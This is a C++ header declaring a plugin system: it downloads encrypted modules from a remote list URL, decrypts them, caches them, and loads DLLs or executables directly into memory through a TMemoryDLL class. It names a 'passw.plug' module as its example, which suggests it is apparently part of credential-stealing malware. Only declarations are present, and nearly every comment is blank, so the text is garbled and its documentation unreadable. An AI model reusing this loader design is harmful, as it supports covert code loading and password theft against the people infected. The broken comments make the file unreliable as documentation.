//---------------------------------------------------------------------------
//
//      
//
//---------------------------------------------------------------------------

#ifndef PluginsH
#define PluginsH
//---------------------------------------------------------------------------

#include "windows.h"
#include "DllLoader.h"

//*****************************************************************************
//      
//
//        :
//          !!!
//           
//     .         
//	          .
//*****************************************************************************

namespace Plugin
{
    //------------------------------------------------------------------------
	//  GetURL -        
	//
	//  Name -   ,  "passw.plug"
	//
	//  PluginsListURL -      .
	//  	  NULL       
	//
	//  UpdateList -    .   
	//                     
	//				   
	//
	//  :
	//            ,    .
	//           ,  NULL  
	//           
	//------------------------------------------------------------------------
	PCHAR GetURL(PCHAR Name, PCHAR PluginsListURL, bool UpdateList);

	//------------------------------------------------------------------------
	//  DownloadPluginList -     
	//  URL -      .  
	//        NULL        .
	//       .     NULL
	//------------------------------------------------------------------------
	PCHAR DownloadPluginList(PCHAR URL);

	//------------------------------------------------------------------------
	//  DownloadFile -      .  
	//				     , ..  .
	//  PluginName -   .
	//  PluginsListURL -     .  NULL
	//                         
	//  FileSize -   ,     .
	//			     .
	//  PluginMd5 -   ,    Md5 ,   .
	//			    .  MD5   -    NULL.
	//                 - STR::Free()
	//
	//  :          
	//                     NULL
	//
	//  :        
	//                    
	//------------------------------------------------------------------------
	LPBYTE DownloadFile(PCHAR PluginName, PCHAR PluginsListURL, DWORD *FileSize, PCHAR* PluginMd5);

	//------------------------------------------------------------------------
	//	DecryptPlugin -   .
	//
	//  Buffer -   
	//
	//  BufferSize -  
	//
	//  NewBufferSize -       
	//					 
	//
	//  IsExecutable -     
	//				          
	//
	//  :         
	//			   
	//
	//  :      
	//------------------------------------------------------------------------
	LPBYTE Decode(LPBYTE Buffer, DWORD BufferSize, bool IsExecutable, DWORD *NewBufferSize);

	//------------------------------------------------------------------------
	//	Download -     
	//
	//  PluginName -   
	//  PluginListURL -   .   NULL   
	//					 
	//  Size -        
	//
	//  IsExecuteble -  ,     
	//                 (dll, exe).   false ,  ,
	//                    
	//
	//  :         
	//			   .        
	//                .   NULL  
	//			       .
	//
	//------------------------------------------------------------------------
    LPBYTE Download(PCHAR PluginName, PCHAR PluginListURL, DWORD *Size, bool IsExecutable = true);


	//------------------------------------------------------------------------
	//	DownloadEx -      
	//				  
	//
	//  PluginName -   
	//  PluginListURL -   .   NULL   
	//					 
	//  Size -        
	//
	//  IsExecuteble -  ,     
	//                 (dll, exe).   false ,  ,
	//                    
	//
	//  UseCashe -   .    
	//			   ,      .    
	//			            .
	//
	//  CachePath -  .   NULL   
	//				  .
	//
	//  :         
	//			   .        
	//                .   NULL  
	//			       .
	//
	//------------------------------------------------------------------------
	LPBYTE DownloadEx(PCHAR PluginName, PCHAR PluginListURL, DWORD *Size,
					  bool IsExecutable, bool UseCache, PCHAR CachePath);

	//-----------------------------------------------
	//  SaveToCache
	//    
	//-----------------------------------------------
	bool SaveToCache(PCHAR PluginName,  LPVOID Data, DWORD DataSize);


	//------------------------------------------------
	//  LoadFromCache
	//      
	//------------------------------------------------
	LPBYTE LoadFromCache(PCHAR PluginName, DWORD *PluginSize);

	//------------------------------------------------
	//  DeleteFromCache
	//        
	//------------------------------------------------
	bool DeleteFromCache(PCHAR PluginName);

}



//--------------------------------------------------
//  TPlugin -      
//--------------------------------------------------
class TPlugin : public TMemoryDLL
{
private:
	string FName;
	LPVOID FData;
	DWORD  FSize;
public:
	TPlugin(const char*   PluginName);
	TPlugin(const string& PluginName);
	~TPlugin();

	//------------------------------------------
	//  Download -    
	//              ,  ,
	//                
	//             
	//
	//  LoadLibrary -  
	//                  
	//------------------------------------------
	bool Download(bool LoadLibrary);

	LPVOID inline Data() { return FData; }
	DWORD  inline Size() { return FSize; }
};


//---------------------------------------------------------------------------
#endif
